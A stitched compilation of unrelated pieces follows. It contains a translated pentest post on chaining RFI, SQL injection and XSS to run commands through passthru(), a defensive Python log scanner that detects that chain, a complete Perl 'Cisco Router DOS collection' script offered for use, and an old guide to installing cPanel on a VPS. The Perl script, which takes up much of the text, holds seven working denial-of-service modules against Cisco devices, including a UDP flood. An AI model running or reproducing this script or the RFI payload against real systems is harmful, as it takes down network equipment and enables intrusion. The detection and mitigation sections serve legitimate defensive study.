RFI over SQL Injection/Cross-Site Scripting

An amusing attack came up during a recent penetration test. It is a good example of a practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection by itself did not let us realize any useful threat or develop the attack further (there it is, the dreaded effect of privilege minimization!). We also could not use the RFI vulnerability on its own, because traffic leaving the technological segment towards the user segment and the outside world was strictly restricted. To exploit the RFI vulnerability, a chain like the following was built:

http:///?param=http:///?param=1+union+select+''&cmd=passthru('ls');

That is, each of these three vulnerabilities taken separately was useless. Only when they were combined for the common good did they let us realize an information security threat, namely execution of arbitrary commands on the server :)

All in all, there is nothing supernatural here, but I found this attack rather amusing...

reference:http://ptresearch.blogspot.com/2010/01/rfi-over-sql-injectioncross-site.html
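The chain above is easier to reason about as a detection problem. The following Python script is an added example, not part of the original post: it parses constructed Apache-style access-log lines, decodes each query parameter, and flags values that are themselves URLs (an RFI indicator), values containing a UNION SELECT (an SQL injection indicator), values that look like PHP execution calls such as passthru(), and, most importantly, URL-valued parameters whose own query string carries a UNION SELECT, which is the nested RFI-over-SQLi pattern. The log lines, IP addresses and parameter names are constructed; the regexes are deliberately simple signatures rather than a full parser.

```python
"""Flag the RFI -> SQL injection chain in web-server access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined-style format; not real traffic.
# Line 1 carries the nested pattern from the post: a URL-valued parameter whose
# own query string contains a UNION SELECT, plus a PHP execution call.
SAMPLE_LOG = [
    '10.1.1.5 - - [12/Jan/2010:10:00:00 +0000] "GET /?param=http://10.2.2.8/?param=1+union+select+%27x%27&cmd=passthru(%27ls%27) HTTP/1.0" 200 512',
    '10.1.1.6 - - [12/Jan/2010:10:00:01 +0000] "GET /?param=news HTTP/1.1" 200 1024',
    '10.1.1.7 - - [12/Jan/2010:10:00:02 +0000] "GET /?param=http://10.2.2.8/page.txt HTTP/1.1" 200 64',
    '10.1.1.8 - - [12/Jan/2010:10:00:03 +0000] "GET /?id=1+union+select+1,2,3 HTTP/1.1" 500 0',
]

# client, two ident/user fields, bracketed timestamp, then the quoted request line.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# A parameter value that starts with a URL scheme is a remote-include candidate.
URL_VALUE_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)
# Minimal SQL injection signature for the UNION-based case shown in the post.
SQLI_RE = re.compile(r'\bunion\b\s+(?:all\s+)?\bselect\b', re.IGNORECASE)
# PHP command-execution calls appearing in a request parameter.
PHP_CALL_RE = re.compile(r'\b(?:passthru|system|shell_exec|exec)\s*\(', re.IGNORECASE)


def indicators_for_value(value, depth=0):
    """Return the set of indicator tags for one decoded parameter value.

    When the value is itself a URL, its query string is decoded and inspected
    recursively (bounded by depth) so that an SQL injection hidden inside the
    include target is reported as the combined chain.
    """
    found = set()
    if SQLI_RE.search(value):
        found.add("sqli")
    if PHP_CALL_RE.search(value):
        found.add("php_call")
    if URL_VALUE_RE.match(value):
        found.add("rfi")
        if depth < 2:
            inner = urlsplit(value)
            for _, inner_value in parse_qsl(inner.query, keep_blank_values=True):
                nested = indicators_for_value(inner_value, depth + 1)
                if "sqli" in nested:
                    found.add("rfi_sqli_chain")
                found |= nested
    return found


def analyze_line(line):
    """Parse one access-log line; return None if it is not a recognisable request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    findings = set()
    # parse_qsl performs percent-decoding and turns '+' into spaces for us.
    for _, value in parse_qsl(target.query, keep_blank_values=True):
        findings |= indicators_for_value(value)
    return {"client": m.group("client"), "path": target.path, "findings": sorted(findings)}


def scan(lines):
    """Return the analysed records that carry at least one indicator."""
    return [rec for rec in map(analyze_line, lines) if rec and rec["findings"]]


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["client"], rec["path"], ",".join(rec["findings"]))
```

On the mitigation side the same chain is cut at either link: the include target should be validated against an allowlist of local files and PHP's allow_url_include left at its default of Off, so that a URL in the parameter is never fetched at all, and the second application's query should use parameterized statements so that the injected SELECT never reaches the database.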

ciscodosexploits.pl

#!/usr/bin/perl -w

#############################
#Cisco Router DOS collection#
# Devilzc0de Framework v.01 #
#############################

#thanks:mywisdom,gunslinger,flyff666,petimati n you!!
#programmer : kiddies A.K.A peneter
#Email : crasher_1412@yahoo.com or peneter@yahoo.com
#community thanks : Devilzc0de,jasakom,whitecyber,antijasakom and all i ve joined

use Socket;
use IO::Socket;


# target host and module number come from the command line
$host  = defined $ARGV[0] ? $ARGV[0] : "";
$pilih = defined $ARGV[1] ? $ARGV[1] : "";

if ($host eq "") {
usage();
}
if ($pilih eq "") {
usage();
}
if ($pilih eq "1") {
cisco1();
}
elsif ($pilih eq "2") {
cisco2();
}
elsif ($pilih eq "3") {
cisco3();
}
elsif ($pilih eq "4") {
cisco4();
}
elsif ($pilih eq "5") {
cisco5();
}
elsif ($pilih eq "6") {
cisco6();
}
elsif ($pilih eq "7") {
cisco7();
}
else {
# only modules 1-7 are implemented below
printf "\ninvalid number....\n\n";
exit(1);
}

sub usage
{
print "\n Cisco Dos Exploits \n";
print "\n Devilzc0de Framework Dos v.0.1\n";
print "\nProgrammer :: kiddies A.K.A peneter\n";
printf"\n";
printf "\nUsage :: Cisco.pl <host> <module number>\n";
printf "\nExploits Module :\n";
printf "[1] - Cisco IOS Router Denial of Service Vulnerability\n";
printf "[2] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
printf "[3] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
printf "[4] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
printf "[5] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
printf "[6] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
printf "[7] - Cisco IOS HTTP Denial of Service Vulnerability\n";
exit(1);
}
sub cisco1 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;

my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...\n\n"};
$sockd->autoflush(1);
print $sockd "GET /\%\% HTTP/1.0\n\n";
close $sockd;
print "Packet sent ...\n";
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
close($sockd2);
exit(1);
}
sub cisco2 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
close($sockd);
exit(1);
}

sub cisco3 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
close($sockd);
exit(1);
}
sub cisco4 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
while (<$sockd>){print}
close($sockd);
exit(1);
}

sub cisco5 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";
my $string = "%%%%%XX%%%%%";

print "Input packets size : ";
$size = <STDIN>;
chomp($size);

socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");

for ($i=0; $i<10000; $i++)
{ send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

printf "\nPackets sent ...\n";
sleep(2);
printf "Please enter a server's open port : ";
$ports = <STDIN>;
chomp $ports;
printf "\nNow checking server status ...\n";
sleep(2);

socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
exit(1);
}

sub cisco6 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
my $ip = $host;
my $vln = "%%%%%XX%%%%%";
my $num = 30000;
my $string = $vln x $num;
my $shc="\015\012";

my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $ip,
PeerPort => "(2002)",
) || die "Unable to connect to $ip:2002 ...\n\n";

$sockd->autoflush(1);
print $sockd "$string" . $shc;
while (<$sockd>){ print }
print "Packet sent ...\n";
close($sockd);
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>"(2002)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
exit(1);
}
sub cisco7 # Cisco IOS HTTP server DoS Vulnerability
{
my $serv = $host;
my $vuln = "GET /TEST?/ HTTP/1.0";

my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...\n\n"};

print $sockd "$vuln\n\n";
print "Packet sent ...\n";
close($sockd);
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
close($sockd2);
exit(1);
}


Try this, ok.... if there is an error, contact me.

How To Install CPANEL on your VPS

Let's start giving some use to all our VPS servers; let's install a trial or a final license of cPanel.

If you want a cPanel license you can get one for $12/month, or $70/month for a 10-pack. You should contact Aaron Conklin at custom.orders@ev1servers.net

In case you want a trial license for cPanel you should go to: http://www.cpanel.net/store/

OK. A few steps to set up your VPS-cPanel:

1 - Log in to your VZMC and get inside your server.
2 - Create a new VPS with the Sample VE Config called vps.cpanel.
3 - Select the IPs you want to use in that VPS and the DNS servers.
4 - Select the RedHat Enterprise template (not minimal).
5 - Don't select any addon. You don't need it for cPanel.
6 - Select the space / memory / CPU, all the normal stuff of your normal VPS. Set "Start on boot" and the rest of the normal stuff. Remember to use unlimited VPs.
7 - Go to your Ev1 member section, open a ticket with your IP and root password, and request Ev1 to get your VPS registered in up2date. CHECK THAT IT IS WELL CONFIGURED!! JUST IN CASE.
8 - Go in via ssh and do the following steps:
mkdir /home/cpins
cd /home/cpins
wget http://layer1.cpanel.net/latest
sh latest

This should install cPanel without asking you any questions.

Article provided by WebHostGear.com

If you have any problems you should check: http://www.cpanel.net/install.html

9 - Log in to https://xxx.xxx.xxx.xxx:2087 and set up your server.
If you have never set up a cPanel server, you can find some useful information here: http://www.cpanel.net/docs.htm or search the Ev1 forum or ask me. I will be happy to help.

Well, hopefully this was useful for some of you and gives you something else to try/offer on your VPS server.

Btw, it needs at least 128 MB for cPanel to work.

If you have any problems with the guide let me know.

carlos

PS: I talked to some SW-Soft people and they recommend enabling second-level quota (QUOTAUGIDLIMIT); I didn't try it myself, but I will let everyone know when I try it.

Thanks to theuruguayan on the devilzc0de forums

reference:http://www.webhostgear.com/208.html